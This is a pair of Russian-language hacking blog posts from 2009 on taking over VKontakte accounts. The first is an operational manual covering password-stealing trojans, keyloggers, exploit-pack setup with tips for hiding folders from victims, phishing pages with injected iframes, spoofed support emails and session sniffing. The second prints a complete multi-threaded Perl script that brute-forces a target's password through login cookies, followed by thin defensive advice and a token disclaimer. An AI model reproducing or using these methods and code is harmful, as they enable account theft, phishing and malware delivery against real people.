Так как частенько новички стали задовать вопросы о том как взломать учетку вконтакте, то решил написать статью-мануал по этому поводу, которая поможет получить ответы на многие вопросы.
Что нам потребуется:

Умение настраивать пинч(если это у вас уже получилось, то остальные 2 требования можно не смотреть)
Прямые руки
Хоть капелька мозга

1) Через мыло, если мы его знаем то уже все проще, ведь имеется как минимум 15 методов взлома почты...НО есть и еще один минус, если пароль "корявый", он разумеется надежный, но с его восстановлением проблемы, когда такой высылают на почту, то он принемает "левый" вид, и соответственно не работает. не в этом
суть, поэтому останавливаться не будем

2) Фейк, достаточно простой способ, кидаем ссылку жертве любым способом(ася, через лс и тд)

3) Троян. Эту категорию мы разделим на другие.

а) Скинуть "чистый" файл, либо ссылку на загрузку его, но тут еще надо чтобы пользователь его запустил.

б) кейлогер - менее полезный, но если жертва его "словит" и вы покопаетесь(причем оочень долго) с отчетом, то пароль получите 100%

в) Сплоит, тут ничего сложного нету, НО ЕСТЬ МИНУС! Паблик сплоиты пробивают в основном ие6 и то, примерно, 6/10(имхо)
Советую армитаж(айс пак тоже в теме). Прост в настройке, нужно только создать базу мускуль(делается в пару кликов), и отредактировать файлы(db.php config.php), после того как зальете на хост, выставляем нужные права, на папку load - 777. config.php - 777
и не забывайте что не надо называть папку с отчетами OtchetyOTpincha, имхо палевно, лучше назовите 404 или еще как, ну что бы внимания не привлекало...Папку в которой будет лежать сплоит, тоже переиминуйте на что-нить типа myphotos и тд... тк люди будут эту ссылку себе в браузер пихать, не нужно что бы там было написанно EXPLOIT...лишнее палево ни к чему...
Идем дальше...
Надеюсь, пинч уже настроен на гейт или почту, желательно что бы он еще и закриптованный был.
Заходим по ссылке на файл install.php нашего сплоита, а потом идем в админку, устанавливаем настройки, выбераем файл который будет грузится жертве, теперь он будет лежать в папке load под именем file.
Кидаем ссылку жертве, и ждем с надеждой что ее пробьет и отчет с паролем нам придет.

4)Брутфорс, как всем известно - перебор паролей. Способ долгий, и не всегда сработает(в случае пароля D5&%-AefV) т шансов подобрать пороль будет немного.

5)Имхо самый надежный способ, открываем исходник нашего фейка, закидываем в него наш код iframe...
Теперь, когда жертва перейдет на нашу ссылку, мы увеличиваем вероятность того, что юзера пробьет, либо через браузер, либо через тупость, тк теперь у нас на ссылке комбинированная атака на мозг(фейк) и браузер(код iframe).

6)Способ приводится много где, здесь нужно поискать сайты на которых сидит жертва(форумы, почта и пр) и попытаться похекать что-то из вышеперечисленного, авось найдем старый заброшенный пароль, а он подойдет.

7) как обычно СИ, пробуем отправить письмо от адресата durov@vkontakte.ru или support@vkontakte.ru с текстом типа, ваша страница на сайте vkontakte.ru будет заблокированна через N дней, если вы не подтвердите какую-нить хрень, методом отправки нам пароля.
Или, можно прислать письмо типа, вам пришло личное сообщение/открытка и пр, от такого-то пользователя, что бы ее прочитать перейдите по ссылке, а ссылка будет вести на наш фейк.
Что-бы отправить письмо с "левого" адреса, нужен какой-нить майлер.
Только не забудьте зарегить себе не привлекающее мыло, похожее на суппортское, и вписать его в поле копия.(что бы пароли пришли именно вам на почту)

8) Снифер, тут лучше отправлять его на почту(если мы знаем мыло), тогда мы без лишних проблем сможем перехватить сессию, и с помощью системы восстановления пароля на сайте вконтакте получить письмо с паролем.
Есть сниферы и получше, но они платные, все же тема распространена и в гуле можно ввсести запрос на пхп снифер и найти много полезной инфы.

9)ХSS, паблик дырок на этом сайте нету, так что кража кукисов маловероятна, хотя если ооочень долго подождать, то можно и дождаться паблик уязвимости - но такой подход к делу бредовый, поэтому останавливаться на нем не будем.

10) Самый простой способ, единственное что от вас требуется - уметь работать с платежными системами и иметь деньги. Просто закажите взлом если вам не помог ни один из 9 пунктов, может найдется умелец который сломает неприступную жертву.

Взлом вКонтакте | Просмотров: 1043 | Добавил: qawsed | Дата: 20.05.2009 | Комментарии (15)

Взлом аккаунта вконтакте
Сравнительно недавно увидел в интернете информацию о том, как взломать аккаунт вконтакте. В статье был предоставлен скрипт для взлома аккаунта. Кроме этого, многие сайты предлагают взломать аккаунт вконтакте за определенную плату.

Какой смысл тратить деньги на взлом, если этому можно научиться без особых проблем? Я проанализировал данную информацию, и сделал некоторые выводы. Сегодня мы поговорим о том, как можно просмотреть закрытые альбомы, как взломать аккаунт, и как защититься от взлома.

В принципе, взломать аккаунт достаточно просто, для этого необходимо иметь навыки по работе со скриптами, и достаточно хорошо в них разбираться. Ниже, предоставляю скрипт для взлома аккаунта вконтакте, возможно некоторые из Вас попробуют улучшить данный скрипт, я возражать не буду.

Данный скрипт написан на perl и не каждый сможет им воспользоваться. Он перебирает пароли к контакту.
список паролей должен находиться в файле: passl.txt

#!/usr/bin/perl

use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;

######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
######################################
$dic = ‘passl.txt’; #словарь паролей
$id = 111111; #id цели
$mail = ‘mail%40mail.com’; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
######################################

open (pass, “<$dic”);

Next:
@pass = pass();

for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }

sub Brut
{

while

(@pass){

$pass = shift @pass;

$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>’tcp’,PeerAddr=>’vkontakte.ru’,PeerPort=>80);
print $sock “HEAD http://vkontakte.ru/ HTTP/1.0\r\n”.
“Host: vkontakte.ru\r\n”.
“Accept: */*\r\n”.
“Content-Type: application/x-www-form-urlencoded\r\n”.
“User-Agent: Mozillo\r\n”.
“Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n”.

“Connection: close\r\n\r\n”;
$answ = <$sock>;
close $sock;
print “$pass $answ”;
if ($answ =~ /302/){
open (good, ‘>>good.txt’);
print good “$id:$pass:$md5\n”;
print “$id:$pass:$md5\n”;
close good;
exit;}
}

}

goto Next;

sub pass
{
my (@mas);
while (
){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}

В принципе, защитить свой аккаунт на вконтакте, практически невозможно. Вам вряд ли поможет постоянное изменение пароля и чистка cookie, так как взлом можно сделать и без них. Кроме этого, написано большое количество вирусов, которые воруют данные, как из вашего компьютера, так и из браузера. Чтобы хоть как-то обезопасить себя от возможной кражи аккаунта, будьте бдительны, не давайте свой пароль и логин посторонним (даже знакомым, по статистике, большинство взломов делают именно они). Лучшее средство от кражи или взлома аккаунта: не заводите себе врагов, которые могут захотеть испортить Вам жизнь или настроение. К слову, компьютер, лучше всего защищать антивирусом (в принципе роли не играет, какой Вы антивирус используете, главное вовремя проверять компьютер на наличие вирусов).
Существуют вирусы, предназначенные для кражи паролей и логинов, некоторые антивирусы не видят этих вирусов, поэтому лучше всего, использовать несколько антивирусов, комбинируя их работу. Так же, лучше всего хранить логины и пароли в неэлектронном виде, например: в блокноте.

Для тех, кто решил купить взлом: лучше не тратьте деньги, просто попробуйте научиться, что-то делать сами, без посторонней помощи. Однако Вы должны помнить о том, что взлом наказуем, существуют законы, которые предусматривают срок заключения для тех, кто занимается взломом сайтов и аккаунтов.

В данной статье, описаны основные приемы для взлома аккаунта вконтакте, однако эти данные, предоставлены здесь исключительно для ознакомительных целей и применять их на практике не рекомендуется.